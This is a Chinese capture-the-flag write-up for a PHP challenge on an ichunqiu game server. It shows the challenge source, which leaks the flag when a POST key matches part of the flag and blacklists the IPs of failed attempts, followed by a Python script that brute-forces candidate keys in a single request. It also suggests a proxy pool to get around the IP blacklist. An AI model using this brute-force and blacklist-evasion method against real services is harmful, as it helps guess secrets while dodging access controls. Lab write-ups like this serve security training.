123456789101112131415161718192021<?phpheader(“content-type:text/html;charset=utf-8”);show_source(__FILE__);echo ‘<pre>’;include(‘u/ip.php’);include(‘flag.php’);if (in_array($_SERVER[‘REMOTE_ADDR’],$ip)){die(“您的ip已进入系统黑名单”);}var_dump($ip);if ($_POST[substr($flag,5,3)]==’attack’){echo $flag;}else if (count($_POST)>0){$ip = ‘$ip[]=”‘.$_SERVER[‘REMOTE_ADDR’].'”;’.PHP_EOL;file_put_contents(‘u/ip.php’,$ip,FILE_APPEND);}echo ‘</pre>’;array(0) {} POST的数据要为$flag的第6位到第9位,一般flag是flag{xxx12321}且数据为attack一次post最多为1000个数据 1234567891011import requestsurl="http://a47333e7d9d743a0b5951d2de698e921d1a1820fde514c99.game.ichunqiu.com/"s='0123456789abcdef'data={}for i in s: for j in s: for k in s[3:6]: data[i+j+k]='attack'print(data)r=requests.post(url,data=data)print(r.text) 我发现重置容器后,flag会变….要开代理池,或者看运气我只跑出来一次,自闭了…